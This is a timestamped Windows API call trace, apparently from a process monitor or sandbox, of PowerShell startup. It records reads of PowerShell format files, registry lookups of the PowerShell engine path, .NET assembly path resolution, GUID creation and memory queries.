	[0576.910] CoCreateGuid (in: pguid=0xad290 | out: pguid=0xad290*(Data1=0xa57d3221, Data2=0xb74e, Data3=0x4767, Data4=([0]=0x82, [1]=0x46, [2]=0x43, [3]=0xd3, [4]=0xb1, [5]=0x2, [6]=0xa4, [7]=0x90))) returned 0x0
	[0576.913] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2e8
	[0576.913] GetFileType (hFile=0x2e8) returned 0x1
	[0576.913] SetErrorMode (uMode=0x1) returned 0x1
	[0576.913] GetFileType (hFile=0x2e8) returned 0x1
	[0576.913] ReadFile (in: hFile=0x2e8, lpBuffer=0x3374d10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xacfd8, lpOverlapped=0x0 | out: lpBuffer=0x3374d10*, lpNumberOfBytesRead=0xacfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0576.915] ReadFile (in: hFile=0x2e8, lpBuffer=0x3374d10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xacfd8, lpOverlapped=0x0 | out: lpBuffer=0x3374d10*, lpNumberOfBytesRead=0xacfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0576.915] ReadFile (in: hFile=0x2e8, lpBuffer=0x3374d10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xacfd8, lpOverlapped=0x0 | out: lpBuffer=0x3374d10*, lpNumberOfBytesRead=0xacfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0576.916] ReadFile (in: hFile=0x2e8, lpBuffer=0x3374d10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xacfd8, lpOverlapped=0x0 | out: lpBuffer=0x3374d10*, lpNumberOfBytesRead=0xacfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0576.916] ReadFile (in: hFile=0x2e8, lpBuffer=0x3374d10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xacfd8, lpOverlapped=0x0 | out: lpBuffer=0x3374d10*, lpNumberOfBytesRead=0xacfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0576.918] ReadFile (in: hFile=0x2e8, lpBuffer=0x3374d10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xacfd8, lpOverlapped=0x0 | out: lpBuffer=0x3374d10*, lpNumberOfBytesRead=0xacfd8*=0xfb2, lpOverlapped=0x0) returned 1
	[0576.918] ReadFile (in: hFile=0x2e8, lpBuffer=0x337442a, nNumberOfBytesToRead=0x4e, lpNumberOfBytesRead=0xacfd8, lpOverlapped=0x0 | out: lpBuffer=0x337442a*, lpNumberOfBytesRead=0xacfd8*=0x0, lpOverlapped=0x0) returned 1
	[0576.918] ReadFile (in: hFile=0x2e8, lpBuffer=0x3374d10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xacfd8, lpOverlapped=0x0 | out: lpBuffer=0x3374d10*, lpNumberOfBytesRead=0xacfd8*=0x0, lpOverlapped=0x0) returned 1
	[0576.918] CloseHandle (hObject=0x2e8) returned 1
	[0576.918] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0xacd20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0576.918] SetErrorMode (uMode=0x1) returned 0x1
	[0576.918] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xacf80 | out: lpFileInformation=0xacf80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67f36317, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67f36317, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe6065417, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x5fb2)) returned 1
	[0576.919] SetErrorMode (uMode=0x1) returned 0x1
	[0576.919] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0xaccb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0576.919] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xad068 | out: phkResult=0xad068*=0x2e8) returned 0x0
	[0576.919] RegQueryValueExW (in: hKey=0x2e8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xacfec, lpData=0x0, lpcbData=0xacfe8*=0x0 | out: lpType=0xacfec*=0x1, lpData=0x0, lpcbData=0xacfe8*=0x56) returned 0x0
	[0576.919] CoTaskMemAlloc (cb=0x5a) returned 0x1b765540
	[0576.919] RegQueryValueExW (in: hKey=0x2e8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xacfbc, lpData=0x1b765540, lpcbData=0xacfb8*=0x56 | out: lpType=0xacfbc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xacfb8*=0x56) returned 0x0
	[0576.919] CoTaskMemFree (pv=0x1b765540) 
	[0576.919] RegCloseKey (hKey=0x2e8) returned 0x0
	[0576.919] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0xaccb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0576.919] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0xacb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0576.923] CoCreateGuid (in: pguid=0xad290 | out: pguid=0xad290*(Data1=0xa088a4, Data2=0x5eb9, Data3=0x4866, Data4=([0]=0x95, [1]=0x16, [2]=0xe1, [3]=0x68, [4]=0xac, [5]=0x21, [6]=0xa9, [7]=0x6d))) returned 0x0
	[0576.928] CoCreateGuid (in: pguid=0xad290 | out: pguid=0xad290*(Data1=0xe1f0914, Data2=0x4206, Data3=0x447b, Data4=([0]=0xbe, [1]=0xa8, [2]=0xf3, [3]=0x60, [4]=0xd2, [5]=0x83, [6]=0xa4, [7]=0xb0))) returned 0x0
	[0576.930] CoCreateGuid (in: pguid=0xad290 | out: pguid=0xad290*(Data1=0x9999e819, Data2=0x75d4, Data3=0x4e9a, Data4=([0]=0xb3, [1]=0xa7, [2]=0x7b, [3]=0x41, [4]=0xa7, [5]=0x2e, [6]=0xa8, [7]=0x5a))) returned 0x0
	[0576.931] CoCreateGuid (in: pguid=0xad290 | out: pguid=0xad290*(Data1=0xb2da6366, Data2=0x85a0, Data3=0x4753, Data4=([0]=0xb0, [1]=0x8d, [2]=0x65, [3]=0xe3, [4]=0xd5, [5]=0xc7, [6]=0x25, [7]=0x40))) returned 0x0
	[0576.931] CoCreateGuid (in: pguid=0xad290 | out: pguid=0xad290*(Data1=0x87665dd3, Data2=0x755d, Data3=0x4c09, Data4=([0]=0x82, [1]=0xbb, [2]=0xc1, [3]=0x3b, [4]=0xd2, [5]=0xd5, [6]=0x7, [7]=0x18))) returned 0x0
	[0576.932] CoCreateGuid (in: pguid=0xad290 | out: pguid=0xad290*(Data1=0x875c61d2, Data2=0xe1a5, Data3=0x4226, Data4=([0]=0xbf, [1]=0x3e, [2]=0x21, [3]=0xb7, [4]=0xce, [5]=0x44, [6]=0xe9, [7]=0xdb))) returned 0x0
	[0576.933] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0xaca50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0576.933] SetErrorMode (uMode=0x1) returned 0x1
	[0576.933] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2e8
	[0576.933] GetFileType (hFile=0x2e8) returned 0x1
	[0576.933] SetErrorMode (uMode=0x1) returned 0x1
	[0576.933] GetFileType (hFile=0x2e8) returned 0x1
	[0576.934] ReadFile (in: hFile=0x2e8, lpBuffer=0x33c0a70, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xacfd8, lpOverlapped=0x0 | out: lpBuffer=0x33c0a70*, lpNumberOfBytesRead=0xacfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0576.935] ReadFile (in: hFile=0x2e8, lpBuffer=0x33c0a70, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xacfd8, lpOverlapped=0x0 | out: lpBuffer=0x33c0a70*, lpNumberOfBytesRead=0xacfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0576.936] ReadFile (in: hFile=0x2e8, lpBuffer=0x33c0a70, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xacfd8, lpOverlapped=0x0 | out: lpBuffer=0x33c0a70*, lpNumberOfBytesRead=0xacfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0576.936] ReadFile (in: hFile=0x2e8, lpBuffer=0x33c0a70, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xacfd8, lpOverlapped=0x0 | out: lpBuffer=0x33c0a70*, lpNumberOfBytesRead=0xacfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0576.939] ReadFile (in: hFile=0x2e8, lpBuffer=0x33c0a70, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xacfd8, lpOverlapped=0x0 | out: lpBuffer=0x33c0a70*, lpNumberOfBytesRead=0xacfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0576.939] ReadFile (in: hFile=0x2e8, lpBuffer=0x33c0a70, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xacfd8, lpOverlapped=0x0 | out: lpBuffer=0x33c0a70*, lpNumberOfBytesRead=0xacfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0576.939] ReadFile (in: hFile=0x2e8, lpBuffer=0x33c0a70, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xacfd8, lpOverlapped=0x0 | out: lpBuffer=0x33c0a70*, lpNumberOfBytesRead=0xacfd8*=0xaca, lpOverlapped=0x0) returned 1
	[0576.939] ReadFile (in: hFile=0x2e8, lpBuffer=0x33c00a2, nNumberOfBytesToRead=0x136, lpNumberOfBytesRead=0xacfd8, lpOverlapped=0x0 | out: lpBuffer=0x33c00a2*, lpNumberOfBytesRead=0xacfd8*=0x0, lpOverlapped=0x0) returned 1
	[0576.939] ReadFile (in: hFile=0x2e8, lpBuffer=0x33c0a70, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xacfd8, lpOverlapped=0x0 | out: lpBuffer=0x33c0a70*, lpNumberOfBytesRead=0xacfd8*=0x0, lpOverlapped=0x0) returned 1
	[0576.939] CloseHandle (hObject=0x2e8) returned 1
	[0576.940] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0xacd20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0576.940] SetErrorMode (uMode=0x1) returned 0x1
	[0576.940] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xacf80 | out: lpFileInformation=0xacf80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67ddf6d2, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67ddf6d2, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5dddcd9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6aca)) returned 1
	[0576.940] SetErrorMode (uMode=0x1) returned 0x1
	[0576.940] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0xaccb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0576.941] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xad068 | out: phkResult=0xad068*=0x2e8) returned 0x0
	[0576.941] RegQueryValueExW (in: hKey=0x2e8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xacfec, lpData=0x0, lpcbData=0xacfe8*=0x0 | out: lpType=0xacfec*=0x1, lpData=0x0, lpcbData=0xacfe8*=0x56) returned 0x0
	[0576.941] CoTaskMemAlloc (cb=0x5a) returned 0x1b765540
	[0576.941] RegQueryValueExW (in: hKey=0x2e8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xacfbc, lpData=0x1b765540, lpcbData=0xacfb8*=0x56 | out: lpType=0xacfbc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xacfb8*=0x56) returned 0x0
	[0576.941] CoTaskMemFree (pv=0x1b765540) 
	[0576.941] RegCloseKey (hKey=0x2e8) returned 0x0
	[0576.941] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0xaccb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0576.941] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0xacb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0576.951] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", nBufferLength=0x105, lpBuffer=0xac4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", lpFilePart=0x0) returned 0x3c
	[0576.952] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xac4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0578.802] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", nBufferLength=0x105, lpBuffer=0xac4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", lpFilePart=0x0) returned 0x48
	[0578.811] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0578.820] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0xac4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0583.844] VirtualQuery (in: lpAddress=0xabb00, lpBuffer=0xac9c0, dwLength=0x30 | out: lpBuffer=0xac9c0*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0583.845] CoCreateGuid (in: pguid=0xad290 | out: pguid=0xad290*(Data1=0x24d9f517, Data2=0x7d43, Data3=0x44c3, Data4=([0]=0xaf, [1]=0x9, [2]=0x32, [3]=0x5d, [4]=0xd7, [5]=0x6c, [6]=0x3d, [7]=0x3e))) returned 0x0
	[0583.846] CoCreateGuid (in: pguid=0xad290 | out: pguid=0xad290*(Data1=0x3085b633, Data2=0xe034, Data3=0x4542, Data4=([0]=0xb9, [1]=0x69, [2]=0x9c, [3]=0x36, [4]=0xf7, [5]=0x6, [6]=0x90, [7]=0xb6))) returned 0x0
	[0583.847] VirtualQuery (in: lpAddress=0xabcb0, lpBuffer=0xacb70, dwLength=0x30 | out: lpBuffer=0xacb70*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0583.848] VirtualQuery (in: lpAddress=0xabcb0, lpBuffer=0xacb70, dwLength=0x30 | out: lpBuffer=0xacb70*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0583.849] CoCreateGuid (in: pguid=0xad290 | out: pguid=0xad290*(Data1=0x56e1c187, Data2=0x8b6, Data3=0x4b40, Data4=([0]=0xa4, [1]=0xe2, [2]=0x96, [3]=0x9b, [4]=0x10, [5]=0x4f, [6]=0x38, [7]=0x96))) returned 0x0
	[0583.852] CoCreateGuid (in: pguid=0xad290 | out: pguid=0xad290*(Data1=0xdbcb146a, Data2=0x2e6c, Data3=0x4d0a, Data4=([0]=0x9b, [1]=0xce, [2]=0x25, [3]=0x52, [4]=0xdb, [5]=0xbf, [6]=0xb5, [7]=0x6f))) returned 0x0
	[0583.853] VirtualQuery (in: lpAddress=0xabf00, lpBuffer=0xacdc0, dwLength=0x30 | out: lpBuffer=0xacdc0*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0583.864] CoCreateGuid (in: pguid=0xad290 | out: pguid=0xad290*(Data1=0x8d007e74, Data2=0xb8e2, Data3=0x49c2, Data4=([0]=0xaf, [1]=0x89, [2]=0xe4, [3]=0x82, [4]=0x6e, [5]=0x69, [6]=0x3a, [7]=0x90))) returned 0x0
	[0583.864] VirtualQuery (in: lpAddress=0xab570, lpBuffer=0xac430, dwLength=0x30 | out: lpBuffer=0xac430*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0583.864] CoCreateGuid (in: pguid=0xad290 | out: pguid=0xad290*(Data1=0x6df5cf6f, Data2=0x3c74, Data3=0x4842, Data4=([0]=0xad, [1]=0xef, [2]=0x63, [3]=0x4c, [4]=0x40, [5]=0xd8, [6]=0xe5, [7]=0x84))) returned 0x0
	[0583.864] CoCreateGuid (in: pguid=0xad290 | out: pguid=0xad290*(Data1=0x25721339, Data2=0x918b, Data3=0x42e8, Data4=([0]=0xae, [1]=0x24, [2]=0x32, [3]=0x9c, [4]=0x3f, [5]=0x45, [6]=0x31, [7]=0x2))) returned 0x0
	[0583.865] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2e4
	[0583.865] GetFileType (hFile=0x2e4) returned 0x1
	[0583.865] SetErrorMode (uMode=0x1) returned 0x1
	[0583.865] GetFileType (hFile=0x2e4) returned 0x1
	[0583.865] ReadFile (in: hFile=0x2e4, lpBuffer=0x32a2958, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xacfd8, lpOverlapped=0x0 | out: lpBuffer=0x32a2958*, lpNumberOfBytesRead=0xacfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0583.865] ReadFile (in: hFile=0x2e4, lpBuffer=0x32a2958, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xacfd8, lpOverlapped=0x0 | out: lpBuffer=0x32a2958*, lpNumberOfBytesRead=0xacfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0583.865] ReadFile (in: hFile=0x2e4, lpBuffer=0x32a2958, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xacfd8, lpOverlapped=0x0 | out: lpBuffer=0x32a2958*, lpNumberOfBytesRead=0xacfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0583.865] ReadFile (in: hFile=0x2e4, lpBuffer=0x32a2958, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xacfd8, lpOverlapped=0x0 | out: lpBuffer=0x32a2958*, lpNumberOfBytesRead=0xacfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0583.866] ReadFile (in: hFile=0x2e4, lpBuffer=0x32a2958, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xacfd8, lpOverlapped=0x0 | out: lpBuffer=0x32a2958*, lpNumberOfBytesRead=0xacfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0583.866] ReadFile (in: hFile=0x2e4, lpBuffer=0x32a2958, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xacfd8, lpOverlapped=0x0 | out: lpBuffer=0x32a2958*, lpNumberOfBytesRead=0xacfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0583.866] ReadFile (in: hFile=0x2e4, lpBuffer=0x32a2958, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xacfd8, lpOverlapped=0x0 | out: lpBuffer=0x32a2958*, lpNumberOfBytesRead=0xacfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0583.866] ReadFile (in: hFile=0x2e4, lpBuffer=0x32a2958, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xacfd8, lpOverlapped=0x0 | out: lpBuffer=0x32a2958*, lpNumberOfBytesRead=0xacfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0583.867] ReadFile (in: hFile=0x2e4, lpBuffer=0x32a2958, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xacfd8, lpOverlapped=0x0 | out: lpBuffer=0x32a2958*, lpNumberOfBytesRead=0xacfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0583.867] ReadFile (in: hFile=0x2e4, lpBuffer=0x32a2958, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xacfd8, lpOverlapped=0x0 | out: lpBuffer=0x32a2958*, lpNumberOfBytesRead=0xacfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0583.868] ReadFile (in: hFile=0x2e4, lpBuffer=0x32a2958, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xacfd8, lpOverlapped=0x0 | out: lpBuffer=0x32a2958*, lpNumberOfBytesRead=0xacfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0583.868] ReadFile (in: hFile=0x2e4, lpBuffer=0x32a2958, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xacfd8, lpOverlapped=0x0 | out: lpBuffer=0x32a2958*, lpNumberOfBytesRead=0xacfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0583.868] ReadFile (in: hFile=0x2e4, lpBuffer=0x32a2958, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xacfd8, lpOverlapped=0x0 | out: lpBuffer=0x32a2958*, lpNumberOfBytesRead=0xacfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0583.869] ReadFile (in: hFile=0x2e4, lpBuffer=0x32a2958, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xacfd8, lpOverlapped=0x0 | out: lpBuffer=0x32a2958*, lpNumberOfBytesRead=0xacfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0583.869] ReadFile (in: hFile=0x2e4, lpBuffer=0x32a2958, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xacfd8, lpOverlapped=0x0 | out: lpBuffer=0x32a2958*, lpNumberOfBytesRead=0xacfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0583.869] ReadFile (in: hFile=0x2e4, lpBuffer=0x32a2958, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xacfd8, lpOverlapped=0x0 | out: lpBuffer=0x32a2958*, lpNumberOfBytesRead=0xacfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0583.871] ReadFile (in: hFile=0x2e4, lpBuffer=0x32a2958, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xacfd8, lpOverlapped=0x0 | out: lpBuffer=0x32a2958*, lpNumberOfBytesRead=0xacfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0583.871] ReadFile (in: hFile=0x2e4, lpBuffer=0x32a2958, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xacfd8, lpOverlapped=0x0 | out: lpBuffer=0x32a2958*, lpNumberOfBytesRead=0xacfd8*=0xbce, lpOverlapped=0x0) returned 1
	[0585.585] ReadFile (in: hFile=0x2e4, lpBuffer=0x32a208e, nNumberOfBytesToRead=0x32, lpNumberOfBytesRead=0xacfd8, lpOverlapped=0x0 | out: lpBuffer=0x32a208e*, lpNumberOfBytesRead=0xacfd8*=0x0, lpOverlapped=0x0) returned 1
	[0585.585] ReadFile (in: hFile=0x2e4, lpBuffer=0x32a2958, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xacfd8, lpOverlapped=0x0 | out: lpBuffer=0x32a2958*, lpNumberOfBytesRead=0xacfd8*=0x0, lpOverlapped=0x0) returned 1
	[0585.585] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xad068 | out: phkResult=0xad068*=0x2e4) returned 0x0
	[0585.586] RegQueryValueExW (in: hKey=0x2e4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xacfec, lpData=0x0, lpcbData=0xacfe8*=0x0 | out: lpType=0xacfec*=0x1, lpData=0x0, lpcbData=0xacfe8*=0x56) returned 0x0
	[0585.586] CoTaskMemAlloc (cb=0x5a) returned 0x216490
	[0585.586] RegQueryValueExW (in: hKey=0x2e4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xacfbc, lpData=0x216490, lpcbData=0xacfb8*=0x56 | out: lpType=0xacfbc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xacfb8*=0x56) returned 0x0
	[0585.586] CoTaskMemFree (pv=0x216490) 
	[0585.586] RegCloseKey (hKey=0x2e4) returned 0x0
	[0585.586] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0xaccb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
